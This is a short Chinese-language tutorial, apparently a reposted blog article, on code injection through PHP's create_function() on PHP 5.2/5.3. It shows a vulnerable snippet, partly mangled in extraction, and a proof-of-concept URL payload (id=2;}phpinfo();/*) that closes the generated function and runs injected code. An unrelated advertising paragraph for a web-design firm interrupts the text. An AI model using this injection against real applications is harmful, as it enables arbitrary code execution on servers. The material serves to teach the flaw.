PHPcreate_function()代码注入
第一部分:介绍php函数 create_function():
创新互联建站专注于企业成都营销网站建设、网站重做改版、白银区网站定制设计、自适应品牌网站建设、html5、购物商城网站建设、集团公司官网建设、成都外贸网站建设公司、高端网站制作、响应式网页设计等建站业务,价格优惠性价比高,为白银区等各大城市提供网站开发制作服务。
string create_function ( string $args , string $code )
string $args变量部分
string $code 方法代码部分
举例:
create_function('$fname','echo $fname."Zhang"')
类似于:
function fT($fname) { echo $fname."Zhang"; }
举一个官方提供的例子:
第二部分:如何利用create_function()代码注入
测试环境版本:
apache +php 5.2、apache +php 5.3
有问题的代码:
"; echo "=============================="; echo "
"; $f1 = create_function('$a',$str2); echo "
"; echo "=============================="; ?>
利用方法:
http://localhost/libtest/02-8.php?id=2;}phpinfo();/*
实现原理:
由于id=2;}phpinfo();/*
执行函数为:
源代码: function fT($a) { echo "test".$a; } 注入后代码: function fT($a) { echo "test";} phpinfo();/*;//此处为注入代码。 }
测试效果:
本文名称:PHPcreate_function()代码注入
网页链接:http://ybzwz.com/article/pdpcos.html